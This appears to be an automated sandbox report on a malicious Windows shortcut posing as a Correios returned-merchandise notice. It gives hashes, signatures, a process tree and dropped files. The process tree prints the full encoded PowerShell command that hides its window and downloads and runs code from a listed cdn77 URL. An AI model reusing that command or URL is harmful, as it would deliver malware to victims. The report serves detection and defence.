Analysis
-
max time kernel
91s -
max time network
95s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
03-06-2024 12:00
Static task
static1
Behavioral task
behavioral1
Sample
Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk
Resource
win10v2004-20240426-en
General
-
Target
Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk
-
Size
3KB
-
MD5
246e74b6fffb9d5994f7f70bb6509b45
-
SHA1
4b7bdf4808ce987b9f94ea40bdd081217867483a
-
SHA256
0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
-
SHA512
178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08
Malware Config
Extracted
https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 9 4196 powershell.exe 13 4196 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 4196 powershell.exe 4196 powershell.exe 4196 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4196 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3660 wrote to memory of 4196 3660 cmd.exe 83 PID 3660 wrote to memory of 4196 3660 cmd.exe 83 PID 4196 wrote to memory of 3520 4196 powershell.exe 84 PID 4196 wrote to memory of 3520 4196 powershell.exe 84 PID 3520 wrote to memory of 640 3520 csc.exe 86 PID 3520 wrote to memory of 640 3520 csc.exe 86
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4196 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rxiqelpl\rxiqelpl.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3520 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES441D.tmp" "c:\Users\Admin\AppData\Local\Temp\rxiqelpl\CSCFA32093BCDA5457A8F96A6E654CC4DD.TMP"4⤵PID:640
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57e5f8cdf1324510f437f6461b8010bf1
SHA133d6765989cbbf97b7f3d301682e66f5e0d4ab7a
SHA2562706269ca0ab90bcb74a8d4835c15ca3b06c1043db8dee5b7defc346e16e2963
SHA512815b34a68398fcc9362f791282334f01470a1a0f11c3703fc7eba7e9b33a629dc57957fdeb61c156021006a59e0a165b78ff013220885c374b1ef0bdfc90d6ed
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5b56d5aa15b56741250e165d33432c9f2
SHA19e5d7f53ec98180eb82a953615f0bf07565c15de
SHA256e29f26e8cc27ebcb82fcc3915cc148c71b9914ce88da803dba46a07f2e66d1ab
SHA512496e57b2cb18bcf4eddf62b7aa27032da6735273384d0eb94738ff63d9ac3c8eb173a80e0c903074dd9fd9fa027ebeb0ab7e93ff6c0c9616672a4a3b83e01c32
-
Filesize
652B
MD5a764751e67b4933e8bfa8cf660ec502a
SHA1b52b846b0c1ce2d1a0d60c0204c43d50838f0a5f
SHA2565b380f4c658006d672b43031fe31dece71b4c1e3c3bd3496a69ee4d0b6afe2bc
SHA512ea0a1467e0023e7f7fbd6dad801b2b8242122cfdf4642c81871e74a8588c26d263036fb778e78c51bc6814d451d895f12583c83a471e214eb8a63928335c28b1
-
Filesize
187B
MD57b0e7177dfbb9edd1c1ef08b4fdfae2f
SHA1cb11a0252cdad66ec247312ccb7feb46456e52b6
SHA2566caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa
SHA5127322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd
-
Filesize
369B
MD5b13936f927e1044e6fbcfae343fb55eb
SHA11772c6ab3ae7797e3db26377e0481af84817efa8
SHA256654fb4421435548594bbfa6efa730ad4d02d9044297f2fe2e6df5f57e3bf9c30
SHA5121eb3af8b657deb7d43b657ce3a963ba272d7789e2f09e1c3c1a9ac97874da369bd0106719d1744d79acb356c1721fd7920504010b40c2eaf98f0cc1b08d3eb7a